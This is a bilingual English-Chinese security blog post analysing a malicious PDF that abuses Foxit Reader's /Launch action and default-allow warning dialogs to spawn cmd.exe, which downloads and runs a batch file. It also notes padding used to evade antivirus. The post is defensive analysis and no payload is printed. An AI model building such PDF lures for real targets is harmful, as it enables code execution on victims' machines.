Shortly after my EXPMON Public announcement on April 7, I was notified by a malware researcher that he/she submitted a PDF sample and it got detected as red Malicious. And, even, the Detection Details says that it’s potentially a “zero-day”.
在 4 月 7 日发布 EXPMON 公告后不久,一位恶意软件研究人员通知我,他/她提交了一份 PDF 样本,结果被检测为红色恶意样本。甚至,检测细节也说这可能是一个“零日”。
(P.S. I don’t check the system often, if you’re an user and happens to find something you could ping me on Twitter/X or email at [email protected])
(附言我不经常检查系统,如果你是用户并且碰巧发现了一些东西,你可以在 Twitter/X 上 ping 我或发送电子邮件至 [email protected])
Check out the original submission here.
在此处查看原始提交。
https://pub.expmon.com/analysis/15986/
Looking into the details you would note that there’s an “Indicator” called “suspicious process created by main” detected in the environment named “win7sp1(update20180524)_foxitreader(2023.2.0.21408)[foxitreader]”.
查看详细信息,您会注意到在名为“win7sp1(update20180524)_foxitreader(2023.2.0.21408)[foxitreader]”的环境中检测到一个名为“main 创建的可疑进程”的“指示器”。
Technically speaking, this means that the system detected a suspicious process created from the main process (in this env, it’s the Foxit Reader process) in the env that runs Foxit Reader version 2023.2.0.21408 on Windows 7. And that our Detection Logic concluded that this is potentially a zero-day exploit, as the Detection Details says.
从技术上讲,这意味着系统在 Windows 7 上运行 Foxit Reader 版本 2023.2.0.21408 的环境中检测到从主进程(在此环境中是 Foxit Reader 进程)创建的可疑进程。我们的检测逻辑得出的结论是,这可能是一个零日漏洞,正如检测细节所说。
Malicious – exploitation activity detected in newer environment, potential zero-day attack
恶意 – 在较新的环境中检测到漏洞利用活动,潜在的零日攻击
You know if the system reports some “zero-day” detection I have an obligation to analyze the sample manually. So I downloaded the sample from the system and tested it in a local env which has the latest Foxit Reader installed. Here are the details.
您知道,如果系统报告一些“零日”检测,我有义务手动分析样本。因此,我从系统中下载了示例,并在安装了最新Foxit Reader的本地环境中进行了测试。以下是详细信息。
When I opened the PDF file with Foxit Reader, I got the following security warning dialog.
当我使用Foxit Reader打开PDF文件时,我收到以下安全警告对话框。
In the background, there’s no suspicious process running. Looks no problem? However, if you look it carefully, you would find out that the *default option* for this dialog is “Trust this document one time only – OK”. That means that a careless user would click the “OK” button (or simply press the “Enter” key) and that would ignore the security warning. And that’s exactly what our system “simulates” in the sandbox environment for this sample.
在后台,没有可疑的进程正在运行。看起来没问题?但是,如果您仔细查看它,您会发现此对话框的*默认选项*是“仅信任此文档一次 – 确定”。这意味着粗心的用户会单击“确定”按钮(或简单地按“Enter”键),这将忽略安全警告。这正是我们的系统在此示例的沙盒环境中“模拟”的内容。
Let’s go ahead, after the first security warning dialog, I got the second one, see the following:
让我们继续,在第一个安全警告对话框之后,我得到了第二个,请参见以下内容:
In the background, there’s still no suspicious process running at this moment. But this 2nd warning dialog also has the bad UI design – the *default option* for this dialog is “Open”, instead of “Do Not Open”. That means that a careless user would click the “Open” (or simply press the “Enter” key) and that would ignore this security warning, again.
在后台,目前仍然没有可疑的进程在运行。但是第二个警告对话框也有糟糕的 UI 设计 – 此对话框的*默认选项* 是“打开”,而不是“不打开”。这意味着粗心的用户将单击“打开”(或简单地按“Enter”键),这将再次忽略此安全警告。
After I clicked the “Open” on the 2nd warning dialog, I observed the “cmd.exe” process running, with malicious parameters.
在我单击第二个警告对话框中的“打开”后,我观察到“cmd.exe”进程正在运行,带有恶意参数。
Apparently, it’s trying to download a .bat file from an attacker-controlled server and execute it.
显然,它试图从攻击者控制的服务器下载.bat文件并执行它。
If we look into the content of the PDF sample, we could confirm our dynamic analysis and find out that this is actually a very simple (but malicious) PDF sample.
如果我们查看 PDF 示例的内容,我们可以确认我们的动态分析,并发现这实际上是一个非常简单(但恶意)的 PDF 示例。
Image copied directly from @SquiblydooBlog’s tweet
图片直接复制自 @SquiblydooBlog 的推文
It has a lot of the ‘:’characters at the beginning of the file, I personally guess it’s for bypassing some static-analyzing Anti-virus software.
它在文件开头有很多“:”字符,我个人猜测它是为了绕过一些静态分析防病毒软件。
Please note that I tested the sample on Adobe Reader too – as our EXPMON system did as well (for every .pdf sample, it will be tested in both Adobe Reader and Foxit Reader, as of the current standard version). On Adobe Reader, the attempt to run external commands (through the “/Launch”) is totally disabled. So it’s safe for Adobe Reader for this malicious sample.
请注意,我也在Adobe Reader上测试了该样本 – 就像我们的EXPMON系统一样(对于每个.pdf样本,从当前标准版本开始,它将在Adobe Reader和Foxit Reader中进行测试)。在Adobe Reader上,运行外部命令(通过“/Launch”)的尝试被完全禁用。因此,Adobe Reader对于此恶意示例是安全的。
Is this a zero-day exploit?
这是零日漏洞吗?
Well, if, by strict speaking/definition, this is indeed a PDF zero-day exploit, as it works on the latest Foxit Reader (version 2024.1.0.23997, as of writing). However, this is somewhat a “lame” one because the user/victim needs to “allow it” twice to achieve code execution. The key point here is the default options for these two security warning dialogs are both for “allowing it”, that would increase the possibility of successful exploitation (for careless users). That’s what this “zero-day” sample is trying to exploit, as our analysis shows.
好吧,如果严格来说/定义,这确实是一个 PDF 零日漏洞,因为它适用于最新的 Foxit Reader(截至撰写本文时,版本为 2024.1.0.23997)。然而,这有点“蹩脚”,因为用户/受害者需要“允许”两次才能实现代码执行。这里的关键点是这两个安全警告对话框的默认选项都是“允许它”,这将增加成功利用的可能性(对于粗心的用户)。正如我们的分析所显示的那样,这就是这个“零日”样本试图利用的东西。
Therefore, I wouldn’t consider this as an FP of the EXPMON system as it detects this sample as “zero-day”.Instead, I consider it a success story.:)
因此,我不会将其视为 EXPMON 系统的 FP,因为它将此样本检测为“零日”。相反,我认为这是一个成功的故事:)
So, stay safe & be vigilant, Foxit Reader users! I will forward this blog post to the vendor of Foxit Reader. If they have any update say fixing their bad designs of the dialogs, I will update here.
所以,保持安全并保持警惕,Foxit Reader用户!我会将这篇博文转发给 Foxit Reader 的供应商。如果他们有任何更新,比如修复他们糟糕的对话框设计,我会在这里更新。
Additional Information 其他信息
As of writing, on VT, this sample has a 10/60 detection ratio.
在撰写本文时,在 VT 上,此样本的检测率为 10/60。
Sample was first saw on VT on March 3, 2024.
样本于 2024 年 3 月 3 日在 VT 上首次出现。
And I just got this information related to threat intel from the original sample submitter @SquiblydooBlog:
我刚刚从原始样本提交者那里获得了与威胁情报相关的信息@SquiblydooBlog:
“it came in an email pretending to be a South Korean legal group, it also contained a few malicious other payloads.”
“它来自一封假装是韩国法律团体的电子邮件,它还包含一些其他恶意有效载荷。
It seems to me that the TA has been trying to leverage this “zero-day” to target Foxit Reader users in South Korea. But please note that this is just my personal impression based on the information I have.
在我看来,TA一直在试图利用这个“零日”来瞄准韩国的福昕读者用户。但请注意,这只是我根据我所掌握的信息的个人印象。
Conclusion 结论
I hope that through this quick analysis of this real-world example, security defenders in this community will better understand how the EXPMON system can help in fighting against advanced zero-day or unknown exploits.
我希望通过对这个真实示例的快速分析,这个社区的安全捍卫者能够更好地了解 EXPMON 系统如何帮助对抗高级零日漏洞或未知漏洞。
I also encourage users to look at the “Indicators” the system produces – they’re very helpful information. Sometimes, even when the Overall Detection Result says “Clean/Undetected”, you may still find some suspicious information in the Indicators.
我还鼓励用户查看系统生成的“指标”——它们是非常有用的信息。有时,即使总体检测结果显示“干净/未检测”,您仍可能在指标中发现一些可疑信息。
As a side note, please also note that if you’re a pro, you could also use our helper tool expmon_sample_submit.py to submit samples. There are some advantages to using the tool – not just it could do a lot of submissions automatically, but also it could obtain accurate raw analysis logs, and sometimes, that information helps.
顺便说一句,如果您是专业人士,您也可以使用我们的辅助工具expmon_sample_submit.py提交样品。使用该工具有一些优点 – 它不仅可以自动完成大量提交,而且还可以获得准确的原始分析日志,有时,这些信息会有所帮助。